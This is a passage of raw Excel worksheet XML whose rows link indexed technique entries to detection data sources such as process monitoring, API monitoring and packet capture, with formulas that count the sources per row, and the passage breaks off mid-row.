    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="16" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="53" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C86" s="17" t="s">
        <v>175</v>
      </c>
      <c r="D86" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E86" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F86" s="53"/>
      <c r="G86" s="19"/>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="16" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="53" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C87" s="17" t="s">
        <v>177</v>
      </c>
      <c r="D87" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E87" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F87" s="53"/>
      <c r="G87" s="19"/>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="16" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="53" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C88" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D88" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E88" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F88" s="53"/>
      <c r="G88" s="19"/>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="16" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="53" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C89" s="17" t="s">
        <v>180</v>
      </c>
      <c r="D89" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E89" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F89" s="53"/>
      <c r="G89" s="19"/>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="16" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="53" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C90" s="17" t="s">
        <v>182</v>
      </c>
      <c r="D90" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E90" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F90" s="53"/>
      <c r="G90" s="19"/>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="16" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="53" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process use of network,Process monitoring,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C91" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D91" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E91" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F91" s="53"/>
      <c r="G91" s="19"/>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="16" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="53" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C92" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D92" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E92" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F92" s="53"/>
      <c r="G92" s="19"/>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="16" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="53" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C93" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D93" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E93" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F93" s="53"/>
      <c r="G93" s="19"/>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="16" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="53" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C94" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D94" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E94" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F94" s="53"/>
      <c r="G94" s="19"/>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="16" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="53" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention</v>
      </c>
      <c r="C95" s="17" t="s">
        <v>189</v>
      </c>
      <c r="D95" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E95" s="53">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F95" s="53"/>
      <c r="G95" s="19"/>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="16" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="53" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C96" s="17" t="s">
        <v>191</v>
      </c>
      <c r="D96" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E96" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F96" s="53"/>
      <c r="G96" s="19"/>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="16" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="53" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C97" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D97" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E97" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F97" s="53"/>
      <c r="G97" s="19"/>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="16" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="53" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network intrusion detection system,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C98" s="17">
        <v>100</v>
      </c>
      <c r="D98" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E98" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F98" s="53"/>
      <c r="G98" s="19"/>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="16" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="53" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs</v>
      </c>
      <c r="C99" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D99" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E99" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F99" s="53"/>
      <c r="G99" s="19"/>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="16" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="53" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C100" s="17" t="s">
        <v>197</v>
      </c>
      <c r="D100" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E100" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F100" s="53"/>
      <c r="G100" s="19"/>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="16" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="53" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C101" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D101" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E101" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F101" s="53"/>
      <c r="G101" s="19"/>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="16" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="53" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C102" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D102" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E102" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F102" s="53"/>
      <c r="G102" s="19"/>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="16" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="53" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C103" s="17" t="s">
        <v>201</v>
      </c>
      <c r="D103" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E103" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F103" s="53"/>
      <c r="G103" s="19"/>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="16" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="53" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:C)</f>
        <v>Host network interface,Netflow/Enclave netflow,Network protocol analysis,Packet capture,SSL/TLS inspection</v>
      </c>
      <c r="C104" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D104" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E104" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F104" s="53"/>
      <c r="G104" s="19"/>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="16" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="53" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network protocol analysis,Packet capture,Process use of network</v>
      </c>
      <c r="C105" s="17" t="s">
        <v>204</v>
      </c>
      <c r="D105" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E105" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F105" s="53"/>
      <c r="G105" s="19"/>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="16" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="53" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C106" s="17" t="s">
        <v>206</v>
      </c>
      <c r="D106" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E106" s="53">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="F106" s="53"/>
      <c r="G106" s="19"/>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="53" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C107" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D107" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E107" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F107" s="53"/>
      <c r="G107" s="19"/>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="16" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="53" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:C)</f>
        <v>System calls,Loaded DLLs,API monitoring,Process monitoring</v>
      </c>
      <c r="C108" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D108" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E108" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F108" s="53"/>
      <c r="G108" s="19"/>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="16" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="53" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C109" s="17" t="s">
        <v>211</v>
      </c>
      <c r="D109" s="53">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E109" s="53">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="F109" s="53"/>
      <c r="G109" s="19"/>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="16" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="53" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Process monitoring,Process use of network,Packet capture,Network protocol analysis,File monitoring,Authentication logs,Binary file metadata</v>
      </c>
      <c r="C110" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D110" s="53">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="E110" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F110" s="53"/>
      <c r="G110" s="19"/>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="16" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="53" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Authentication logs</v>
      </c>
      <c r="C111" s="17">
        <v>100</v>
      </c>
      <c r="D111" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E111" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F111" s="53"/>
      <c r="G111" s="19"/>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="16" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="53" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Kernel drivers</v>
      </c>
      <c r="C112" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D112" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E112" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F112" s="53"/>
      <c r="G112" s="19"/>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="16" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="53" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C113" s="17" t="s">
        <v>217</v>
      </c>
      <c r="D113" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E113" s="53">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="F113" s="53"/>
      <c r="G113" s="19"/>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="53" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C114" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D114" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E114" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F114" s="53"/>
      <c r="G114" s="19"/>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="16" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="53" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:C)</f>
        <v>Office 365 trace logs,Mail server,Email gateway,Authentication logs,File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C115" s="17" t="s">
        <v>221</v>
      </c>
      <c r="D115" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E115" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F115" s="53"/>
      <c r="G115" s="19"/>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="16" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="53" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C116" s="17">
        <v>100</v>
      </c>
      <c r="D116" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E116" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F116" s="53"/>
      <c r="G116" s="19"/>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="53" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C117" s="17">
        <v>100</v>
      </c>
      <c r="D117" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E117" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F117" s="53"/>
      <c r="G117" s="19"/>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="16" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="53" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C118" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D118" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E118" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F118" s="53"/>
      <c r="G118" s="19"/>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="16" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="53" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C119" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D119" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E119" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F119" s="53"/>
      <c r="G119" s="19"/>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="53" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Data loss prevention,Process command-line parameters</v>
      </c>
      <c r="C120" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D120" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E120" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F120" s="53"/>
      <c r="G120" s="19"/>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="16" t="s">
        <v>227</v>
      </c>
      <c r="B121" s="53" t="str">
        <f>LOOKUP(A121,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C121" s="17">
        <v>0</v>
      </c>
      <c r="D121" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E121" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F121" s="53"/>
      <c r="G121" s="19"/>
    </row>
    <row r="122" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A122" s="16" t="s">
        <v>228</v>
      </c>
      <c r="B122" s="53" t="str">
        <f>LOOKUP(A122,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C122" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D122" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E122" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F122" s="53"/>
      <c r="G122" s="19"/>
    </row>
    <row r="123" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A123" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B123" s="53" t="str">
        <f>LOOKUP(A123,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C123" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D123" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E123" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F123" s="53"/>
      <c r="G123" s="19"/>
    </row>
    <row r="124" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A124" s="16" t="s">
        <v>231</v>
      </c>
      <c r="B124" s="53" t="str">
        <f>LOOKUP(A124,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="C124" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D124" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E124" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F124" s="53"/>
      <c r="G124" s="19"/>
    </row>
    <row r="125" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A125" s="16" t="s">
        <v>232</v>
      </c>
      <c r="B125" s="53" t="str">
        <f>LOOKUP(A125,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,API monitoring</v>
      </c>
      <c r="C125" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D125" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E125" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F125" s="53"/>
      <c r="G125" s="19"/>
    </row>
    <row r="126" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A126" s="16" t="s">
        <v>233</v>
      </c>
      <c r="B126" s="53" t="str">
        <f>LOOKUP(A126,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C126" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D126" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E126" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F126" s="53"/>
      <c r="G126" s="19"/>
    </row>
    <row r="127" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A127" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B127" s="53" t="str">
        <f>LOOKUP(A127,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,API monitoring</v>
      </c>
      <c r="C127" s="17" t="s">
        <v>235</v>
      </c>
      <c r="D127" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E127" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F127" s="53"/>
      <c r="G127" s="19"/>
    </row>
    <row r="128" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A128" s="16" t="s">
        <v>236</v>
      </c>
      <c r="B128" s="53" t="str">
        <f>LOOKUP(A128,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C128" s="17">
        <v>100</v>
      </c>
      <c r="D128" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E128" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F128" s="53"/>
      <c r="G128" s="19"/>
    </row>
    <row r="129" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A129" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B129" s="53" t="str">
        <f>LOOKUP(A129,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C129" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D129" s="53">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E129" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F129" s="53"/>
      <c r="G129" s="19"/>
    </row>
    <row r="130" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A130" s="16" t="s">
        <v>238</v>
      </c>
      <c r="B130" s="53" t="str">
        <f>LOOKUP(A130,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C130" s="17" t="s">
        <v>239</v>
      </c>
      <c r="D130" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E130" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F130" s="53"/>
      <c r="G130" s="19"/>
    </row>
    <row r="131" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A131" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B131" s="53" t="str">
        <f>LOOKUP(A131,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C131" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D131" s="53">
        <f t="shared" ref="D131:D194" si="5">LEN(TRIM(B131))-LEN(SUBSTITUTE(TRIM(B131),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E131" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F131" s="53"/>
      <c r="G131" s="19"/>
    </row>
    <row r="132" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A132" s="16" t="s">
        <v>241</v>
      </c>
      <c r="B132" s="53" t="str">
        <f>LOOKUP(A132,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Process monitoring</v>
      </c>
      <c r="C132" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D132" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E132" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F132" s="53"/>
      <c r="G132" s="19"/>
    </row>
    <row r="133" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A133" s="16" t="s">
        <v>242</v>
      </c>
      <c r="B133" s="53" t="str">
        <f>LOOKUP(A133,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C133" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D133" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E133" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F133" s="53"/>
      <c r="G133" s="19"/>
    </row>
    <row r="134" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A134" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B134" s="53" t="str">
        <f>LOOKUP(A134,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C134" s="17">
        <v>100</v>
      </c>
      <c r="D134" s="53">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E134" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F134" s="53"/>
      <c r="G134" s="19"/>
    </row>
    <row r="135" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A135" s="16" t="s">
        <v>244</v>
      </c>
      <c r="B135" s="53" t="str">
        <f>LOOKUP(A135,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows event logs,API monitoring,Access tokens,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C135" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D135" s="53">
        <f t="shared" si="5"/>
